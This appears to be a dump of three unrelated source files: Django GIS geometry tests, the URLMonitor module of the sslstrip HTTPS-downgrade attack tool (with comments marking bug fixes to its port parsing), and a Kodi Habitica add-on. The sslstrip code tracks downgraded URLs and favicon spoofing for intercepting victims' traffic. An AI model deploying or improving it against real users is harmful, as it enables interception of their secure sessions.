        str(new_shell)  # new shell is still accessible
        self.assertEqual(poly.exterior_ring, new_shell)
        self.assertEqual(poly[0], new_shell)

    # ### Testing the mutability of Geometry Collections
    for tg in self.geometries.multipoints:
        mp = fromstr(tg.wkt)
        for i in range(len(mp)):
            # Creating a random point.
            pnt = mp[i]
            new = Point(random.randint(21, 100), random.randint(21, 100))
            # Testing the assignment
            mp[i] = new
            str(new)  # what was used for the assignment is still accessible
            self.assertEqual(mp[i], new)
            self.assertEqual(mp[i].wkt, new.wkt)
            self.assertNotEqual(pnt, mp[i])

    # MultiPolygons involve much more memory management because each
    # Polygon w/in the collection has its own rings.
    for tg in self.geometries.multipolygons:
        mpoly = fromstr(tg.wkt)
        for i in range(len(mpoly)):
            poly = mpoly[i]
            old_poly = mpoly[i]
            # Offsetting the each ring in the polygon by 500.
            for j in range(len(poly)):
                r = poly[j]
                for k in range(len(r)):
                    r[k] = (r[k][0] + 500., r[k][1] + 500.)
                poly[j] = r

            self.assertNotEqual(mpoly[i], poly)
            # Testing the assignment
            mpoly[i] = poly
            str(poly)  # Still accessible
            self.assertEqual(mpoly[i], poly)
            self.assertNotEqual(mpoly[i], old_poly)

    # Extreme (!!) __setitem__ -- no longer works, have to detect
    # in the first object that __setitem__ is called in the subsequent
    # objects -- maybe mpoly[0, 0, 0] = (3.14, 2.71)?
    # mpoly[0][0][0] = (3.14, 2.71)
    # self.assertEqual((3.14, 2.71), mpoly[0][0][0])
    # Doing it more slowly..
    # self.assertEqual((3.14, 2.71), mpoly[0].shell[0])
    # del mpoly
def test_point_list_assignment(self):
    # Slice assignment replaces all of a point's coordinates at once and
    # may change its dimensionality (2D <-> 3D).
    p = Point(0, 0)
    p[:] = (1, 2, 3)
    self.assertEqual(p, Point(1, 2, 3))
    p[:] = (1, 2)
    # NOTE(review): comparing a WKT string against a Point relies on the
    # reflected GEOSGeometry.__eq__, which accepts (E)WKT strings.
    self.assertEqual(p.wkt, Point(1, 2))
    # A point must have exactly 2 or 3 coordinates.
    with self.assertRaises(ValueError):
        p[:] = (1,)
    with self.assertRaises(ValueError):
        p[:] = (1, 2, 3, 4, 5)
def test_linestring_list_assignment(self):
    ls = LineString((0, 0), (1, 1))
    # Slice assignment may change the number of points in the line.
    ls[:] = ((0, 0), (1, 1), (2, 2))
    self.assertEqual(ls, LineString((0, 0), (1, 1), (2, 2)))
    # A LineString needs at least two valid points.
    with self.assertRaises(ValueError):
        ls[:] = (1,)
def test_linearring_list_assignment(self):
    ls = LinearRing((0, 0), (0, 1), (1, 1), (0, 0))
    # Slice assignment may change the number of points in the ring.
    ls[:] = ((0, 0), (0, 1), (1, 1), (1, 0), (0, 0))
    self.assertEqual(ls, LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
    # A ring must remain closed: first point equal to the last.
    with self.assertRaises(ValueError):
        ls[:] = ((0, 0), (1, 1), (2, 2))
def test_threed(self):
    "Testing three-dimensional geometries."
    # Testing a 3D Point
    pnt = Point(2, 3, 8)
    self.assertEqual((2., 3., 8.), pnt.coords)
    # A 3D point cannot be collapsed to 2D via set_coords().
    self.assertRaises(TypeError, pnt.set_coords, (1., 2.))
    pnt.coords = (1., 2., 3.)
    self.assertEqual((1., 2., 3.), pnt.coords)

    # Testing a 3D LineString
    ls = LineString((2., 3., 8.), (50., 250., -117.))
    self.assertEqual(((2., 3., 8.), (50., 250., -117.)), ls.tuple)
    # Likewise, a vertex of a 3D line must stay 3D.
    self.assertRaises(TypeError, ls.__setitem__, 0, (1., 2.))
    ls[0] = (1., 2., 3.)
    self.assertEqual((1., 2., 3.), ls[0])
def test_distance(self):
    "Testing the distance() function."
    origin = Point(0, 0)
    # A geometry is at distance zero from itself.
    self.assertEqual(0.0, origin.distance(Point(0, 0)))
    # Unit distance along the y axis.
    self.assertEqual(1.0, origin.distance(Point(0, 1)))
    # The diagonal of the unit square is sqrt(2).
    self.assertAlmostEqual(1.41421356237, origin.distance(Point(1, 1)), 11)
    # Distance between line strings is measured between the closest
    # vertices of each geometry: from (2, 2) to (5, 2), i.e. 3.
    line_a = LineString((0, 0), (1, 1), (2, 2))
    line_b = LineString((5, 2), (6, 1), (7, 0))
    self.assertEqual(3, line_a.distance(line_b))
def test_length(self):
    "Testing the length property."
    # A point has zero length.
    self.assertEqual(0.0, Point(0, 0).length)
    # A diagonal unit segment has length sqrt(2).
    diagonal = LineString((0, 0), (1, 1))
    self.assertAlmostEqual(1.41421356237, diagonal.length, 11)
    # A polygon's length is the circumference of its rings.
    square = Polygon(LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
    self.assertEqual(4.0, square.length)
    # A collection's length is the sum of its members' lengths.
    self.assertEqual(8.0, MultiPolygon(square.clone(), square).length)
def test_emptyCollections(self):
    "Testing empty geometries and collections."
    # Empty geometries constructed both directly and from EMPTY WKT.
    gc1 = GeometryCollection([])
    gc2 = fromstr('GEOMETRYCOLLECTION EMPTY')
    pnt = fromstr('POINT EMPTY')
    ls = fromstr('LINESTRING EMPTY')
    poly = fromstr('POLYGON EMPTY')
    mls = fromstr('MULTILINESTRING EMPTY')
    mpoly1 = fromstr('MULTIPOLYGON EMPTY')
    mpoly2 = MultiPolygon(())

    for g in [gc1, gc2, pnt, ls, poly, mls, mpoly1, mpoly2]:
        self.assertEqual(True, g.empty)

        # Testing len() and num_geom.
        if isinstance(g, Polygon):
            self.assertEqual(1, len(g))  # Has one empty linear ring
            self.assertEqual(1, g.num_geom)
            self.assertEqual(0, len(g[0]))
        elif isinstance(g, (Point, LineString)):
            self.assertEqual(1, g.num_geom)
            self.assertEqual(0, len(g))
        else:
            self.assertEqual(0, g.num_geom)
            self.assertEqual(0, len(g))

        # Testing __getitem__ (doesn't work on Point or Polygon)
        if isinstance(g, Point):
            self.assertRaises(IndexError, g.get_x)
        elif isinstance(g, Polygon):
            lr = g.shell
            self.assertEqual('LINEARRING EMPTY', lr.wkt)
            self.assertEqual(0, len(lr))
            self.assertEqual(True, lr.empty)
            self.assertRaises(IndexError, lr.__getitem__, 0)
        else:
            self.assertRaises(IndexError, g.__getitem__, 0)
def test_collection_dims(self):
    # dims reports the maximum topological dimension of the members:
    # -1 for an empty collection, 0 for points, 1 for lines, 2 for polygons.
    cases = [
        (GeometryCollection([]), -1),
        (GeometryCollection(Point(0, 0)), 0),
        (GeometryCollection(LineString((0, 0), (1, 1)), Point(0, 0)), 1),
        (GeometryCollection(LineString((0, 0), (1, 1)), Polygon(((0, 0), (0, 1), (1, 1), (0, 0))), Point(0, 0)), 2),
    ]
    for collection, expected in cases:
        self.assertEqual(collection.dims, expected)
def test_collections_of_collections(self):
    "Testing GeometryCollection handling of other collections."
    # Creating a GeometryCollection WKT string composed of other
    # collections and polygons.
    coll = [mp.wkt for mp in self.geometries.multipolygons if mp.valid]
    coll.extend(mls.wkt for mls in self.geometries.multilinestrings)
    coll.extend(p.wkt for p in self.geometries.polygons)
    coll.extend(mp.wkt for mp in self.geometries.multipoints)
    gc_wkt = 'GEOMETRYCOLLECTION(%s)' % ','.join(coll)

    # Should construct ok from WKT
    gc1 = GEOSGeometry(gc_wkt)

    # Should also construct ok from individual geometry arguments.
    gc2 = GeometryCollection(*tuple(g for g in gc1))

    # And, they should be equal.
    self.assertEqual(gc1, gc2)
@skipUnless(HAS_GDAL, "GDAL is required.")
def test_gdal(self):
    "Testing `ogr` and `srs` properties."
    g1 = fromstr('POINT(5 23)')
    self.assertIsInstance(g1.ogr, gdal.OGRGeometry)
    # No SRID was given, so no spatial reference can be derived.
    self.assertIsNone(g1.srs)

    # 3D geometries keep their z value in the OGR counterpart.
    g1_3d = fromstr('POINT(5 23 8)')
    self.assertIsInstance(g1_3d.ogr, gdal.OGRGeometry)
    self.assertEqual(g1_3d.ogr.z, 8)

    g2 = fromstr('LINESTRING(0 0, 5 5, 23 23)', srid=4326)
    self.assertIsInstance(g2.ogr, gdal.OGRGeometry)
    self.assertIsInstance(g2.srs, gdal.SpatialReference)
    # The hex representation must survive the GEOS -> OGR conversion.
    self.assertEqual(g2.hex, g2.ogr.hex)
    self.assertEqual('WGS 84', g2.srs.name)
def test_copy(self):
    "Testing use with the Python `copy` module."
    import copy
    poly = GEOSGeometry('POLYGON((0 0, 0 23, 23 23, 23 0, 0 0), (5 5, 5 10, 10 10, 10 5, 5 5))')
    # Both shallow and deep copies must clone the underlying GEOS
    # geometry rather than alias the original pointer.
    for duplicate in (copy.copy(poly), copy.deepcopy(poly)):
        self.assertNotEqual(poly._ptr, duplicate._ptr)
@skipUnless(HAS_GDAL, "GDAL is required to transform geometries")
def test_transform(self):
    "Testing `transform` method."
    orig = GEOSGeometry('POINT (-104.609 38.255)', 4326)
    trans = GEOSGeometry('POINT (992385.4472045 481455.4944650)', 2774)

    # Using a srid, a SpatialReference object, and a CoordTransform object
    # for transformations.
    t1, t2, t3 = orig.clone(), orig.clone(), orig.clone()
    t1.transform(trans.srid)
    t2.transform(gdal.SpatialReference('EPSG:2774'))
    ct = gdal.CoordTransform(gdal.SpatialReference('WGS84'), gdal.SpatialReference(2774))
    t3.transform(ct)

    # Testing use of the `clone` keyword.
    k1 = orig.clone()
    k2 = k1.transform(trans.srid, clone=True)
    self.assertEqual(k1, orig)  # with clone=True the source is untouched
    self.assertNotEqual(k1, k2)

    # All three transformation paths must agree with the reference point
    # to three decimal places.
    prec = 3
    for p in (t1, t2, t3, k2):
        self.assertAlmostEqual(trans.x, p.x, prec)
        self.assertAlmostEqual(trans.y, p.y, prec)
@skipUnless(HAS_GDAL, "GDAL is required to transform geometries")
def test_transform_3d(self):
    p3d = GEOSGeometry('POINT (5 23 100)', 4326)
    p3d.transform(2774)
    # The z coordinate must pass through the 2D transform untouched.
    self.assertEqual(p3d.z, 100)
@skipUnless(HAS_GDAL, "GDAL is required.")
def test_transform_noop(self):
    """ Testing `transform` method (SRID match) """
    # transform() should no-op if source & dest SRIDs match,
    # regardless of whether GDAL is available.
    g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
    gt = g.tuple
    g.transform(4326)
    self.assertEqual(g.tuple, gt)
    self.assertEqual(g.srid, 4326)

    g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
    g1 = g.transform(4326, clone=True)
    self.assertEqual(g1.tuple, g.tuple)
    self.assertEqual(g1.srid, 4326)
    self.assertIsNot(g1, g, "Clone didn't happen")

    # Same assertions must hold with GDAL reported as unavailable.
    with mock.patch('django.contrib.gis.gdal.HAS_GDAL', False):
        g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
        gt = g.tuple
        g.transform(4326)
        self.assertEqual(g.tuple, gt)
        self.assertEqual(g.srid, 4326)

        g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
        g1 = g.transform(4326, clone=True)
        self.assertEqual(g1.tuple, g.tuple)
        self.assertEqual(g1.srid, 4326)
        self.assertIsNot(g1, g, "Clone didn't happen")
@skipUnless(HAS_GDAL, "GDAL is required.")
def test_transform_nosrid(self):
    """ Testing `transform` method (no SRID or negative SRID) """
    # Without a usable source SRID, both the in-place and the cloning
    # variants of transform() must raise.
    for srid in (None, -1):
        for use_clone in (False, True):
            g = GEOSGeometry('POINT (-104.609 38.255)', srid=srid)
            if use_clone:
                self.assertRaises(GEOSException, g.transform, 2774, clone=True)
            else:
                self.assertRaises(GEOSException, g.transform, 2774)
@mock.patch('django.contrib.gis.gdal.HAS_GDAL', False)
def test_transform_nogdal(self):
    """ Testing `transform` method (GDAL not available) """
    # Without GDAL, transforming between different SRIDs must fail loudly.
    g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
    self.assertRaises(GEOSException, g.transform, 2774)

    g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
    self.assertRaises(GEOSException, g.transform, 2774, clone=True)
def test_extent(self):
    "Testing `extent` method."
    # For a MultiPoint, extent is (xmin, ymin, xmax, ymax) over all members.
    mp = MultiPoint(Point(5, 23), Point(0, 0), Point(10, 50))
    self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)

    # A single point's extent is just its own coordinates repeated.
    pnt = Point(5.23, 17.8)
    self.assertEqual((5.23, 17.8, 5.23, 17.8), pnt.extent)

    # Testing on the 'real world' Polygon.
    poly = fromstr(self.geometries.polygons[3].wkt)
    xs, ys = poly.shell.x, poly.shell.y
    expected = (min(xs), min(ys), max(xs), max(ys))
    self.assertEqual(expected, poly.extent)
def test_pickle(self):
    "Testing pickling and unpickling support."
    # Using both pickle and cPickle -- just 'cause.
    from django.utils.six.moves import cPickle
    import pickle

    # Creating a list of test geometries for pickling,
    # and setting the SRID on some of them.
    def get_geoms(lst, srid=None):
        return [GEOSGeometry(tg.wkt, srid) for tg in lst]
    tgeoms = get_geoms(self.geometries.points)
    tgeoms.extend(get_geoms(self.geometries.multilinestrings, 4326))
    tgeoms.extend(get_geoms(self.geometries.polygons, 3084))
    tgeoms.extend(get_geoms(self.geometries.multipolygons, 3857))

    for geom in tgeoms:
        s1, s2 = cPickle.dumps(geom), pickle.dumps(geom)
        g1, g2 = cPickle.loads(s1), pickle.loads(s2)
        for tmpg in (g1, g2):
            self.assertEqual(geom, tmpg)
            # The SRID must survive the pickle round-trip as well.
            self.assertEqual(geom.srid, tmpg.srid)
def test_prepared(self):
    "Testing PreparedGeometry support."
    # Creating a simple multipolygon and getting a prepared version.
    mpoly = GEOSGeometry('MULTIPOLYGON(((0 0,0 5,5 5,5 0,0 0)),((5 5,5 10,10 10,10 5,5 5)))')
    prep = mpoly.prepared

    # A set of test points.
    pnts = [Point(5, 5), Point(7.5, 7.5), Point(2.5, 7.5)]
    covers = [True, True, False]  # No `covers` op for regular GEOS geoms.
    for pnt, c in zip(pnts, covers):
        # Results should be the same (but faster)
        self.assertEqual(mpoly.contains(pnt), prep.contains(pnt))
        self.assertEqual(mpoly.intersects(pnt), prep.intersects(pnt))
        self.assertEqual(c, prep.covers(pnt))

    # Other predicates available on the prepared geometry.
    self.assertTrue(prep.crosses(fromstr('LINESTRING(1 1, 15 15)')))
    self.assertTrue(prep.disjoint(Point(-5, -5)))
    poly = Polygon(((-1, -1), (1, 1), (1, 0), (-1, -1)))
    self.assertTrue(prep.overlaps(poly))
    poly = Polygon(((-5, 0), (-5, 5), (0, 5), (-5, 0)))
    self.assertTrue(prep.touches(poly))
    poly = Polygon(((-1, -1), (-1, 11), (11, 11), (11, -1), (-1, -1)))
    self.assertTrue(prep.within(poly))

    # Original geometry deletion should not crash the prepared one (#21662)
    del mpoly
    self.assertTrue(prep.covers(Point(5, 5)))
def test_line_merge(self):
    "Testing line merge support"
    # Each case pairs an input geometry with its expected merged form:
    # duplicate vertices are dropped and touching segments are joined.
    cases = [
        (fromstr('LINESTRING(1 1, 1 1, 3 3)'),
         fromstr('LINESTRING(1 1, 3 3)')),
        (fromstr('MULTILINESTRING((1 1, 3 3), (3 3, 4 2))'),
         fromstr('LINESTRING (1 1, 3 3, 4 2)')),
    ]
    for geom, expected in cases:
        self.assertEqual(expected, geom.merged)
def test_valid_reason(self):
    "Testing IsValidReason support"
    g = GEOSGeometry("POINT(0 0)")
    self.assertTrue(g.valid)
    self.assertIsInstance(g.valid_reason, six.string_types)
    self.assertEqual(g.valid_reason, "Valid Geometry")

    # A degenerate linestring (both points identical) is invalid.
    g = GEOSGeometry("LINESTRING(0 0, 0 0)")
    self.assertFalse(g.valid)
    self.assertIsInstance(g.valid_reason, six.string_types)
    # Only check the message prefix; the suffix varies across GEOS versions.
    self.assertTrue(g.valid_reason.startswith("Too few points in geometry component"))
@skipUnless(HAS_GEOS, "Geos is required.")
def test_linearref(self):
    "Testing linear referencing"
    ls = fromstr('LINESTRING(0 0, 0 10, 10 10, 10 0)')
    mls = fromstr('MULTILINESTRING((0 0, 0 10), (10 0, 10 10))')

    # project() returns the distance along the line to the point nearest
    # its argument; interpolate() is the inverse operation.
    self.assertEqual(ls.project(Point(0, 20)), 10.0)
    self.assertEqual(ls.project(Point(7, 6)), 24)
    self.assertEqual(ls.project_normalized(Point(0, 20)), 1.0 / 3)

    self.assertEqual(ls.interpolate(10), Point(0, 10))
    self.assertEqual(ls.interpolate(24), Point(10, 6))
    self.assertEqual(ls.interpolate_normalized(1.0 / 3), Point(0, 10))

    # The same operations work across the parts of a multi-linestring.
    self.assertEqual(mls.project(Point(0, 20)), 10)
    self.assertEqual(mls.project(Point(7, 6)), 16)

    self.assertEqual(mls.interpolate(9), Point(0, 9))
    self.assertEqual(mls.interpolate(17), Point(10, 7))
def test_geos_version(self):
    """Testing the GEOS version regular expression."""
    from django.contrib.gis.geos.libgeos import version_regex
    # Each sample pairs a raw GEOS version banner with the library and
    # C-API versions the regex is expected to extract from it.
    samples = (
        ('3.0.0rc4-CAPI-1.3.3', '3.0.0', '1.3.3'),
        ('3.0.0-CAPI-1.4.1', '3.0.0', '1.4.1'),
        ('3.4.0dev-CAPI-1.8.0', '3.4.0', '1.8.0'),
        ('3.4.0dev-CAPI-1.8.0 r0', '3.4.0', '1.8.0'),
    )
    for banner, expected_geos, expected_capi in samples:
        match = version_regex.match(banner)
        self.assertTrue(match, msg="Unable to parse the version string '%s'" % banner)
        self.assertEqual(match.group('version'), expected_geos)
        self.assertEqual(match.group('capi_version'), expected_capi)
|
bsd-3-clause
|
glennbarrett/sslstrip
|
sslstrip/URLMonitor.py
|
60
|
2839
|
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import re
class URLMonitor:
    '''
    The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
    server is expecting over SSL.  It also keeps track of secure favicon urls.
    '''

    # Start the arms race, and end up here...
    javascriptTrickery = [re.compile(r"http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
    _instance = None

    def __init__(self):
        self.strippedURLs = set()
        self.strippedURLPorts = {}
        self.faviconReplacement = False
        # BUG FIX: the readers below use 'faviconSpoofing', but only
        # setFaviconSpoofing() ever defined it -- calling
        # isFaviconSpoofing()/isSecureFavicon() first raised AttributeError.
        self.faviconSpoofing = False

    def isSecureLink(self, client, url):
        """Return True if (client, url) was stripped from HTTPS, or if the
        url matches one of the known javascript tricks."""
        for expression in URLMonitor.javascriptTrickery:
            if re.match(expression, url):
                return True
        return (client, url) in self.strippedURLs

    def getSecurePort(self, client, url):
        """Return the original HTTPS port for a stripped url, or 443."""
        if (client, url) in self.strippedURLs:
            return self.strippedURLPorts[(client, url)]
        return 443

    def addSecureLink(self, client, url):
        """Record that the absolute `url` was served to `client` over SSL,
        normalizing away any explicit ':port' in the host part."""
        methodIndex = url.find("//") + 2
        method = url[0:methodIndex]

        pathIndex = url.find("/", methodIndex)
        if pathIndex == -1:
            # No path component (e.g. 'https://host:port'): the remainder
            # is all host, and the path is empty.  The old slicing silently
            # chopped the last character off the host in this case.
            pathIndex = len(url)
        host = url[methodIndex:pathIndex]
        path = url[pathIndex:]

        port = 443
        portIndex = host.find(":")
        if portIndex != -1:
            # BUG FIX: extract the port BEFORE truncating the host.  The
            # original truncated first and then sliced the port out of the
            # already-truncated host, which always yielded an empty string,
            # so explicit ports (e.g. ':8443') were silently replaced by 443.
            port = host[portIndex + 1:]
            host = host[0:portIndex]
            if len(port) == 0:
                port = 443

        url = method + host + path
        self.strippedURLs.add((client, url))
        self.strippedURLPorts[(client, url)] = int(port)

    def setFaviconSpoofing(self, faviconSpoofing):
        self.faviconSpoofing = faviconSpoofing

    def isFaviconSpoofing(self):
        return self.faviconSpoofing

    def isSecureFavicon(self, client, url):
        return (self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)

    def getInstance():
        # Process-wide singleton, shared by all request handlers.
        if URLMonitor._instance == None:
            URLMonitor._instance = URLMonitor()
        return URLMonitor._instance
    getInstance = staticmethod(getInstance)
|
gpl-3.0
|
Majed6/kodi-habitica
|
script.habitica/addon.py
|
1
|
6718
|
#! python3
# -*- coding: utf-8 -*-
import os
import xbmcaddon
import xbmcgui
import datetime
import resources.lib.httplib2 as httplib2
import urllib
import json
# Add-on-wide singletons shared by the window class and the entry code.
addon = xbmcaddon.Addon()
dialog = xbmcgui.Dialog()
# Reusable HTTP client (bundled httplib2) for all Habitica API calls.
http = httplib2.Http()
class Habitica(xbmcgui.Window):
    """Main add-on window.

    Shows the user's Habitica profile summary and avatar, lists the
    user's habits, dailies and to-dos, and scores a selected entry as
    complete via the Habitica v3 REST API.
    """

    def __init__(self):
        # Static layout: background art, profile label, three category
        # buttons, the task list and the avatar image.
        self.background = xbmcgui.ControlImage(0, 0, 1280, 720, 'special://home/addons/script.habitica/resources/media/fanart.jpg')
        self.profile = xbmcgui.ControlLabel(450, 0, 700, 50, 'XP:0/0 HP:0/0 Gold:0 Silver:0')
        self.habitsButton = xbmcgui.ControlButton(0, 50, 200, 50, 'Habits', textOffsetX=70)
        self.dailiesButton = xbmcgui.ControlButton(200, 50, 200, 50, 'Dailies', textOffsetX=70)
        self.todoButton = xbmcgui.ControlButton(400, 50, 200, 50, 'TODO', textOffsetX=70)
        self.cList = xbmcgui.ControlList(0, 110, 800, 550, selectedColor="0xC0FF0000")
        self.avatar = xbmcgui.ControlImage(900, 90, 350, 350, 'special://home/addons/script.habitica/resources/media/icon.png')
        for control in (self.background, self.profile, self.habitsButton,
                        self.dailiesButton, self.todoButton, self.cList,
                        self.avatar):
            self.addControl(control)
        # Stored credentials; empty strings until the first login.
        # BUG FIX: getSetting() returns str on Python 3 (Kodi 19+), where
        # calling .decode("utf-8") on it raised AttributeError.
        self.API_Token = self._as_text(addon.getSetting("API_Token"))
        self.ID = self._as_text(addon.getSetting("ID"))

    @staticmethod
    def _as_text(value):
        """Return `value` as text, decoding UTF-8 bytes if necessary."""
        return value.decode("utf-8") if isinstance(value, bytes) else value

    @staticmethod
    def _urlencode(data):
        """Form-encode `data` on both Python 2 and Python 3.

        BUG FIX: the module imports top-level `urllib`, whose `urlencode`
        attribute exists only on Python 2; on Python 3 (per the `#! python3`
        shebang) it lives in `urllib.parse`, so the original calls raised
        AttributeError.
        """
        if not data:
            return ''
        try:
            from urllib.parse import urlencode  # Python 3
        except ImportError:
            from urllib import urlencode  # Python 2
        return urlencode(data)

    def onControl(self, Control):
        """Dispatch clicks from the category buttons and the task list."""
        if Control == self.habitsButton:
            self.getAllhabits()
        elif Control == self.dailiesButton:
            self.getAllDaillies()
        elif Control == self.todoButton:
            self.getAllTasks()
        elif Control == self.cList:
            choice = dialog.yesno('Mark as complete', "Do you want to mark \"" + Control.getSelectedItem().getLabel() + "\" as Complete?")
            if choice:
                self.score(Control.getSelectedItem())

    def login(self):
        """Prompt for credentials, authenticate, and persist the API token."""
        username = dialog.input('Login Username')
        password = dialog.input('Login Password', option=xbmcgui.ALPHANUM_HIDE_INPUT)
        url = 'https://habitica.com/api/v3/user/auth/local/login'
        body = {'username': username, 'password': password}
        headers = {'Accept': 'application/json', 'Content-type': 'application/x-www-form-urlencoded'}
        response, content = http.request(url, 'POST', headers=headers, body=self._urlencode(body))
        if response['status'] != "200":
            msg = response['status'] + ': Login failed. Do you want to retry?'
            choice = dialog.yesno('Login Failed', msg)
            if choice:
                self.login()
            else:
                quit()
            return
        dContent = json.loads(content)
        addon.setSetting(id='API_Token', value=dContent['data']['apiToken'])
        addon.setSetting(id='ID', value=dContent['data']['id'])
        # BUG FIX: also refresh the in-memory credentials -- callAPI()
        # reads self.API_Token immediately after login(), and previously
        # kept using the stale empty string for the rest of the session.
        self.API_Token = dContent['data']['apiToken']
        self.ID = dContent['data']['id']

    def callAPI(self, method, partialURL, postData):
        """Issue an authenticated request against the Habitica v3 API and
        return the decoded JSON response."""
        if self.API_Token == '':
            self.login()
        baseURL = 'https://habitica.com/api/v3'
        headers = {'Accept': 'application/json', 'Content-type': 'application/x-www-form-urlencoded', 'x-api-user': self.ID, 'x-api-key': self.API_Token}
        response, content = http.request(baseURL + partialURL, method, headers=headers, body=self._urlencode(postData))
        return json.loads(content)

    def getProfile(self):
        """Refresh the stats label and avatar; return the raw stats dict."""
        profile = self.callAPI('GET', '/members/' + self.ID, '')['data']['stats']
        gold = int(profile['gp'])
        silver = int((profile['gp'] - gold) * 100)
        level = profile['lvl']
        xp = profile['exp']
        hp = profile['hp']  # max health is always 50
        # XP needed for the next level (Habitica's level curve, rounded to tens).
        lvlupAt = int(round((0.25 * (level ** 2) + 10 * level + 139.75) / 10) * 10)
        tProfile = "XP:" + str(xp) + "/" + str(lvlupAt) + " HP:" + str(hp) + "/50" + " Gold:" + str(gold) + " Silver:" + str(silver)
        self.profile.setLabel(tProfile)
        self.getAvatar()
        return profile

    def _fillList(self, entries, kind):
        """Reset the list control and add one item per entry, tagging each
        with its Habitica id and its category for score()."""
        self.cList.reset()
        for entry in entries:
            listitem = xbmcgui.ListItem(entry['text'] + "")
            listitem.setProperty('type', kind)
            listitem.setUniqueIDs({'id': entry['id']})
            self.cList.addItem(listitem)

    def getAllTasks(self):
        """Show the user's uncompleted to-dos."""
        tasks = self.callAPI('GET', '/tasks/user?type=todos', '')['data']
        if tasks == []:
            dialog.ok('All tasks Completed', 'You have completed all of your tasks!')
            return
        self._fillList(tasks, 'task')

    def getAllDaillies(self):
        """Show the dailies that repeat today and are not yet completed."""
        dailies = self.callAPI('GET', '/tasks/user?type=dailys', '')['data']
        if dailies == []:
            # BUG FIX: Dialog.ok() requires a heading AND a message; the
            # original one-argument calls raised TypeError.
            dialog.ok('Dailies', 'There are no dailies!')
            return
        # Habitica encodes repeat days with these keys.
        weekday = {0: 'm', 1: 't', 2: 'w', 3: 'th', 4: 'f', 5: 's', 6: 'su'}
        today = weekday[datetime.datetime.today().weekday()]
        due = [d for d in dailies if d['repeat'][today] and not d['completed']]
        self._fillList(due, 'daily')
        if self.cList.size() == 0:
            dialog.ok('Dailies', 'No dailies for today!')

    def getAllhabits(self):
        """Show the user's habits."""
        habits = self.callAPI('GET', '/tasks/user?type=habits', '')['data']
        if habits == []:
            dialog.ok('Habits', 'There are no habits!')
            return
        self._fillList(habits, 'habit')

    def getAvatar(self):
        """Point the avatar control at the server-rendered avatar image."""
        self.avatar.setImage('https://habitica.com/export/avatar-' + self.ID + '.png', False)

    def score(self, item):
        """Score `item` "up", notify the user of the gains, and refresh
        the list the item came from."""
        before = self.getProfile()
        after = self.callAPI("POST", '/tasks/' + item.getUniqueID('id') + '/score/' + 'up', '')['data']
        gold = abs(int(after['gp'] - before['gp']))
        silver = abs(int(((after['gp'] - int(after['gp'])) - (before['gp'] - int(before['gp']))) * 100))
        xp = after['exp'] - before['exp']
        habiticaNotiXP = "★+" + str(xp) + " Experince"
        habiticaNotiCash = "⚫+" + str(gold) + " GOLD" + " ⚪+" + str(silver) + " Silver"
        kind = item.getProperty('type')
        if kind == 'task':
            dialog.notification('Task scored', habiticaNotiXP, xbmcgui.NOTIFICATION_INFO)
            dialog.notification('Task scored', habiticaNotiCash, xbmcgui.NOTIFICATION_INFO)
            self.getAllTasks()
        elif kind == 'daily':
            dialog.notification('Daily scored', habiticaNotiXP, xbmcgui.NOTIFICATION_INFO)
            dialog.notification('Daily scored', habiticaNotiCash, xbmcgui.NOTIFICATION_INFO)
            self.getAllDaillies()
        elif kind == 'habit':
            dialog.notification('Habit scored', habiticaNotiXP, xbmcgui.NOTIFICATION_INFO)
            dialog.notification('Habit scored', habiticaNotiCash, xbmcgui.NOTIFICATION_INFO)
            # BUG FIX: this previously called self.getAllHabits(), which
            # does not exist (the method is named getAllhabits) and raised
            # AttributeError right after scoring a habit.
            self.getAllhabits()
# Entry point: build the window, populate the profile header and the
# TODO list, then block in the modal loop until the user closes it.
win = Habitica()
win.show()
win.getProfile()
win.getAllTasks()
win.doModal()
|
gpl-3.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.